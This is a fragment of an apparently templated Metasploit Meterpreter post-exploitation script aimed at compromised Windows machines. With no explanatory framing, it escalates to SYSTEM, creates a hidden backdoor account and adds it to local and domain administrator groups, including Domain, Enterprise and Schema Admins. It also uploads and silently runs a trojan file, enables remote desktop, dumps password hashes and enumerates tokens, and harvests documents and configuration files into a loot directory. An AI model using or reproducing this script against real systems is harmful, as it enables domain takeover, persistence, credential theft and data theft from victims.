				session.load_priv
				session.load_incognito				
				session.run_cmd('getsystem')
				session.sys.process.execute("net user #!TS_ADMIN_USER!# #!TS_ADMIN_USER!#")
				session.sys.process.execute("net localgroup Administrators #!TS_ADMIN_USER!# /add#")
				#!TS_AUTOPOST_PERSISTENCE!#
				session.run_cmd('upload ./.trojans/wintroll.cmd .')
				session.run_cmd('upload ./.trojans/wallpaper.bmp .')
				session.run_cmd('execute -H -f wintroll.cmd')
                                session.run_cmd('use espia')
                                session.run_cmd('use incognito')
                                session.run_cmd('add_user #!TS_ADMIN_USER!# #!TS_ADMIN_PASS!# -h')
                                session.run_cmd('add_localgroup_user Administrators #!TS_ADMIN_USER!# -h')
                                session.run_cmd('add_localgroup_user "Remote Desktop Users" #!TS_ADMIN_USER!# -h')
                                session.run_cmd('add_group_user "Domain Admins" #!TS_ADMIN_USER!# -h')
                                session.run_cmd('add_group_user "Enterprise Admins" #!TS_ADMIN_USER!# -h')
                                session.run_cmd('add_group_user "Schema Admins" #!TS_ADMIN_USER!# -h')
                                session.run_cmd('run getgui -e')
				session.run_cmd('run post/windows/gather/smart_hashdump')
				session.run_cmd('run post/windows/gather/enum_tokens')
				session.run_cmd("run file_collector -d 'C:\' -f 'hosts|*.pdf|*.cfg|*.zip|*.tgz|*.gzip|*.tar|*.conf|*.ini|*.xls|*.xlsx|*.doc|*.docx|*.txt' -o /tmp/#{file}.fc")
				session.run_cmd("run file_collector -i /tmp/#{file}.fc -l #!TS_LOOT_DIR!##{lootdir}")
